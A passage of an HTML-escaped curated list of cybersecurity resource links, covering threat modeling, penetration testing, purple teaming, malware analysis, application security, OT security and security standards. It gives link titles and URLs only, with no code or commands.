&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://shellsharks.com/threat-modeling&#34;&gt;A Threat Modeling Field Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/TalEliyahu/Threat_Model_Examples&#34;&gt;Threat Model Examples&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.threatmodelingmanifesto.org/&#34;&gt;Threat Modeling Manifesto&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://insights.sei.cmu.edu/sei_blog/2018/12/threat-modeling-12-available-methods.html&#34;&gt;Threat Modeling: 12 Available Methods&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.mitre.org/sites/default/files/2021-11/prs-18-1174-ngci-cyber-threat-modeling.pdf&#34;&gt;Cyber Threat Modeling: Survey, Assessment, and Representative Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Threat-Driven-Approach.pdf&#34;&gt;A Threat-Driven Approach to Cyber Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cheatsheetseries.owasp.org/cheatsheets/Threat_Modeling_Cheat_Sheet.html&#34;&gt;OWASP Threat Modeling Cheat Sheet&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;penetration_testing&#34;&gt;Penetration Testing and Red Teaming&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Methodologies and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/OWASP/wstg/releases/download/v4.2/wstg-v4.2.pdf&#34;&gt;OWASP Web Security Testing Guide (WSTG) v4.2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.isecom.org/OSSTMM.3.pdf&#34;&gt;Open Source Security Testing Methodology Manual (OSSTMM) v3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/osstmm.en.2.1.pdf&#34;&gt;Open Source Security Testing Methodology Manual (OSSTMM) v2.1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/issaf0.2.1.pdf&#34;&gt;Information Systems Security Assessment Framework (ISSAF) v0.2.1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://www.pentest-standard.org/index.php/Main_Page&#34;&gt;Penetration Testing Execution Standard (PTES)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/NIST.SP.800-115.pdf&#34;&gt;NIST Technical Guide to Information Security Testing and Assessment (SP 800-115)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.first.org/cvss/&#34;&gt;CVSS - Common Vulnerability Scoring System&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.fedramp.gov/assets/resources/documents/CSP_Penetration_Test_Guidance.pdf&#34;&gt;FedRAMP Penetration Test Guidance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.crest-approved.org/wp-content/uploads/2022/04/CREST-Penetration-Testing-Guide-1.pdf&#34;&gt;CREST - A guide for running an effective Penetration Testing programme&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.gfma.org/wp-content/uploads/0/83/197/231/fff190cf-305a-44a6-a429-39848f22a48b.pdf&#34;&gt;GFMA Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ecb.europa.eu/paym/cyber-resilience/tiber-eu/html/index.en.html&#34;&gt;TIBER-EU Framework&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://smartgrid.epri.com/doc/NESCORGuidetoPenetrationTestingforElectricUtilities-v3-Final.pdf&#34;&gt;NESCOR Guide to Penetration Testing for Electric Utilities&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cyberark.com/resources/threat-research-blog/thick-client-penetration-testing-methodology&#34;&gt;CyberArk Thick Client Penetration Testing Methodology&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iso.org/standard/72889.html&#34;&gt;ISO/IEC 18045:2022 - Evaluation criteria for IT security — Methodology for IT security evaluation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf&#34;&gt;Google Hacking for Penetration Testers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://portswigger.net/web-security&#34;&gt;PortSwigger WebSecurity Academy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://university.apisec.ai/&#34;&gt;API Security University&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/swisskyrepo/PayloadsAllTheThings&#34;&gt;PayloadsAllTheThings&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/enaqx/awesome-pentest&#34;&gt;Awesome Penetration Testing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61?gi=792386eee43b&#34;&gt;Kerberosity Killed the Domain: An Offensive Kerberos Overview&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://lolbas-project.github.io/&#34;&gt;LOLBAS - Living Off The Land Binaries, Scripts and Libraries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gtfobins.github.io/&#34;&gt;GTFOBins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://lolrmm.io/&#34;&gt;LOLRMM - Living Off The Land Remote Monitoring and Management&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://weibell.github.io/reverse-shell-generator/&#34;&gt;Reverse Shell Generator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://nmap.org/&#34;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/BC-SECURITY/Empire&#34;&gt;Empire&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/SpecterOps/BloodHound&#34;&gt;BloodHound&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/fortra/impacket&#34;&gt;Impacket&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://howto.thec2matrix.com/&#34;&gt;The C2 Matrix&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;purple_teaming&#34;&gt;Purple Teaming&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Methodologies and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/scythe-io/purple-team-exercise-framework&#34;&gt;Purple Team Exercise Framework (PTEF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.scythe.io/library/introducing-the-purple-team-maturity-model&#34;&gt;Purple Team Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/redcanaryco/atomic-red-team&#34;&gt;Atomic Red Team&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://caldera.mitre.org/&#34;&gt;MITRE Caldera&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.akamai.com/infectionmonkey&#34;&gt;Infection Monkey&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/SecurityRiskAdvisors/VECTR&#34;&gt;VECTR&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/alphasoc/flightsim&#34;&gt;Network Flight Simulator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/vectra-ai-research/MAAD-AF&#34;&gt;MAAD-AF&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/ch33r10/EnterprisePurpleTeaming&#34;&gt;Enterprise Purple Teaming&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/center-for-threat-informed-defense/adversary_emulation_library&#34;&gt;CTID Adversary Emulation Library&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;malware_analysis&#34;&gt;Malware Analysis&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://malwareunicorn.org/#/workshops&#34;&gt;Malware Unicorn Workshops&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/hasherezade/malware_training_vol1&#34;&gt;Haseherezade Malware Training vol. 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://class.malware.re/&#34;&gt;Introduction to Malware Analysis and Reverse Engineering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://untrustednetwork.net/files/russinovich-malware-hunting-with-the-sysinternals-tools.pdf&#34;&gt;Malware Hunting with the Sysinternals Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/jstrosch/learning-reverse-engineering&#34;&gt;Learning Reverse Engineering&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/NationalSecurityAgency/ghidra/tree/master/GhidraDocs/GhidraClass&#34;&gt;Ghidra Class&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/rshipp/awesome-malware-analysis&#34;&gt;Awesome Malware Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/fr0gger/awesome-ida-x64-olly-plugin/blob/master/README.md&#34;&gt;Awesome IDA, Ghidra, x64DBG, GDB &amp;amp; OllyDBG plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/0x4143/malware-gems/blob/master/README.md&#34;&gt;malware-gems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.untrustednetwork.net/en/sandboxes/&#34;&gt;Overview of free online malware analysis sandboxes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/Obfuscator-Collections/&#34;&gt;Obfuscator Collections&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Sample sources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/ytisf/theZoo&#34;&gt;theZoo - A Live Malware Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/jstrosch/malware-samples&#34;&gt;Malware Samples&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://zeltser.com/malware-sample-sources/&#34;&gt;Malware Sample Sources for Researchers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://bazaar.abuse.ch/&#34;&gt;MalwareBazaar&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/vxunderground/MalwareSourceCode&#34;&gt;vx-underground Malware Source Code&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.vx-underground.org/malware.html&#34;&gt;vx-underground Malware Collections&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/fireeye/flare-vm&#34;&gt;Flare VM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://remnux.org/&#34;&gt;REMnux: A Linux Toolkit for Malware Analysis&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite&#34;&gt;Sysinternals Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://blog.didierstevens.com/didier-stevens-suite/&#34;&gt;Didier Stevens Suite&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.winitor.com/download&#34;&gt;pestudio&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/cert-ee/cuckoo3&#34;&gt;Cuckoo3 Sandbox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/kevoreilly/CAPEv2&#34;&gt;CAPE: Malware Configuration And Payload Extraction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/CERT-Polska/drakvuf-sandbox&#34;&gt;DRAKVUF Sandbox&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/NationalSecurityAgency/ghidra&#34;&gt;Ghidra&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://malcat.fr/&#34;&gt;Malcat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://hash.cymru.com/&#34;&gt;Malware Hash Registry&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/MobSF/Mobile-Security-Framework-MobSF&#34;&gt;Mobile Security Framework (MobSF)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process&#34;&gt;Ten process injection techniques: A technical survey of common and trending process injection techniques&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.winitor.com/pdf/Malware-Analysis-Fundamentals-Files-Tools.pdf&#34;&gt;Malware Analysis Fundamentals - Files &amp;amp; Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://malpedia.caad.fkie.fraunhofer.de/&#34;&gt;Malpedia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://unprotect.it/&#34;&gt;Unprotect Project&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;application_security&#34;&gt;Application Security&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Standards and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://ieeecs-media.computer.org/media/technical-activities/CYBSI/docs/Top-10-Flaws.pdf&#34;&gt;Avoiding the Top 10 Software Security Design Flaws&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.microsoft.com/en-us/securityengineering/sdl/practices&#34;&gt;Microsoft Security Development Lifecycle Practices&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/projects/ssdf&#34;&gt;NIST Secure Software Development Framework (SSDF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf&#34;&gt;NIST Systems Security Engineering: Considerations for a Multidisciplinary Approach in the Engineering of Trustworthy Secure Systems (SP 800-160 Vol. 1)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v2r1.pdf&#34;&gt;NIST Developing Cyber-Resilient Systems: A Systems Security Engineering Approach (SP 800-160 Vol. 2)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/pubs/sp/800/190/final&#34;&gt;NIST Application Container Security Guide (SP 800-190)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iso.org/standard/44716.html&#34;&gt;ISO/IEC 21827:2008 - Systems Security Engineering — Capability Maturity Model (SSE-CMM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-application-security-verification-standard/&#34;&gt;OWASP Application Security Verification Standard&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owaspsamm.org/&#34;&gt;OWASP SAMM - Software Assurance Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-developer-guide/&#34;&gt;OWASP Developer Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-mobile-security-testing-guide/&#34;&gt;OWASP Mobile Security Project&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-code-review-guide/&#34;&gt;OWASP Code Review Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/Top10/&#34;&gt;OWASP Top 10&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-top-10-ci-cd-security-risks/&#34;&gt;OWASP Top 10 CI/CD Security Risks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-api-security/&#34;&gt;OWASP API Security Top 10&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://owasp.org/www-project-devsecops-maturity-model/&#34;&gt;OWASP DSOMM - DevSecOps Maturity Model&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://resources.sei.cmu.edu/asset_files/TechnicalReport/2009_005_001_15110.pdf&#34;&gt;SEI Secure Design Patterns&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices&#34;&gt;SEI Top 10 Secure Coding Practices&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.practical-devsecops.com/devsecops-university/&#34;&gt;DevSecOps University&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/sottlmarek/DevSecOps&#34;&gt;Ultimate DevSecOps Library&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/analysis-tools-dev&#34;&gt;Analysis Tools&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/sbom&#34;&gt;CISA Software Bill of Materials (SBOM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cyclonedx.org/&#34;&gt;OWASP CycloneDX&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://spdx.dev/specifications/#current-version&#34;&gt;Software Package Data Exchange (SPDX)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://cwe.mitre.org/top25/&#34;&gt;CWE Top 25 Most Dangerous Software Weaknesses&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#threat_modeling&#34;&gt;Threat Modeling Resources&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;ot_security&#34;&gt;OT Security&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Standards and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r3.pdf&#34;&gt;NIST Guide to Operational Technology (OT) Security (SP 800-82 Rev. 3)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;http://www.pera.net/&#34;&gt;Purdue Enterprise Reference Architecture&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/white-papers/five-ics-cybersecurity-critical-controls/&#34;&gt;SANS Five ICS Cybersecurity Critical Controls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.28.pdf&#34;&gt;NIST Cybersecurity White Paper - Security Segmentation in a Small Manufacturing Environment (CSWP 28)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://apps.dtic.mil/sti/citations/AD1056116&#34;&gt;Advanced Cyber Industrial Control System Tactics, Techniques, and Procedures (ACI TTP) for Department of Defense (DOD) Industrial Control Systems (ICS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.iiconsortium.org/wp-content/uploads/sites/2/2023/06/IISF-Version-2.pdf&#34;&gt;Industrial Internet of Things Security Framework (IISF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.mitre.org/news-insights/publication/crown-jewels-analysis-industrial-control-systems&#34;&gt;Crown Jewels Analysis (CJA) for Industrial Control Systems (ICS)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Training Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/ics-training-available-through-cisa&#34;&gt;ICS Training Available Through CISA&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Collections of Resources
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.robertmlee.org/a-collection-of-resources-for-getting-started-in-icsscada-cybersecurity/&#34;&gt;A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/hslatman/awesome-industrial-control-system-security&#34;&gt;Awesome Industrial Control System Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Tools
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://www.controlthings.io/platform&#34;&gt;ControlThings Platform&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/mitre/caldera-ot&#34;&gt;Caldera for OT Plugins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/nsacyber/GRASSMARLIN&#34;&gt;GRASSMARLIN&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;ul&gt;
&lt;li&gt;Misc
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://github.com/cisagov/ICSNPP&#34;&gt;CISA Industrial Control Systems Network Protocol Parsers (ICSNPP) for Zeek&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://drive.google.com/file/d/1_22MtEjveuv-Apl2ghQrfR5TaSnSPJAG/view?usp=drive_web&#34;&gt;Scanning Higly Sensitive Networks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.cisa.gov/sites/default/files/2023-01/Procurement_Language_Rev4_100809_S508C.pdf&#34;&gt;Cyber Security Procurement Language for Control Systems&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://literature.rockwellautomation.com/idc/groups/literature/documents/td/enet-td001_-en-p.pdf&#34;&gt;Converged Plantwide Ethernet (CPwE) Design and Implementation Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://gca.isa.org/hubfs/ISAGCA%20Quick%20Start%20Guide%20FINAL.pdf&#34;&gt;Quick Start Guide: An Overview of ISA/IEC 62443 Standards&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://f.hubspotusercontent10.net/hubfs/5382318/Applying%20ISO%20IEC%2027001%202%20and%20the%20ISA%20IEC%2062443%20Series%20White%20Paper.pdf&#34;&gt;Applying ISO/IEC 27001/2 and the ISA/IEC 62443 Series for Operational Technology Environments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.namur.net/fileadmin/media_www/Dokumente/AK-PRAXIS_4.18_NA163_Checkliste_EN_2017_12_15.xlsx&#34;&gt;NAMUR Checklist for Risk Assessment of Safety Industrial Systems (AK-PRAXIS 4.18: NA163 Checklist)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.ferc.gov/sites/default/files/2020-04/E-2_11.pdf&#34;&gt;FERC Order 706&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.sans.org/mlp/ics-field-manual&#34;&gt;SANS ICS Cybersecurity Field Manual&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://isagca.org/hubfs/2023 ISA Website Redesigns/ISAGCA/PDFs/Industrial Cybersecurity Knowledge FINAL.pdf&#34;&gt;CURRICULAR GUIDANCE: Industrial Cybersecurity Knowledge&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h2 id=&#34;misc&#34;&gt;Miscellaneuos&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Standards and Best Practices
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;https://learn.cisecurity.org/control-download-v8-1&#34;&gt;CIS Critical Security Controls&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://learn.cisecurity.org/cis-ram-2-download&#34;&gt;CIS Risk Assessment Method (RAM)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.etsi.org/deliver/etsi_ts/103300_103399/10330501/05.01.01_60/ts_10330501v050101p.pdf&#34;&gt;ETSI TR 103 305-1: Critical Security Controls for Effective Cyber Defence&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://www.nist.gov/cyberframework&#34;&gt;NIST Cybersecurity Framework (CSF)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://csrc.nist.gov/publications/detail/sp/800-30/rev-1/final&#34;&gt;NIST Guide for Conducting Risk Assessments (SP 800-30r1)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-137.pdf&#34;&gt;NIST Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations (SP 800-137)&lt;/a&gt;&lt;/li&gt;
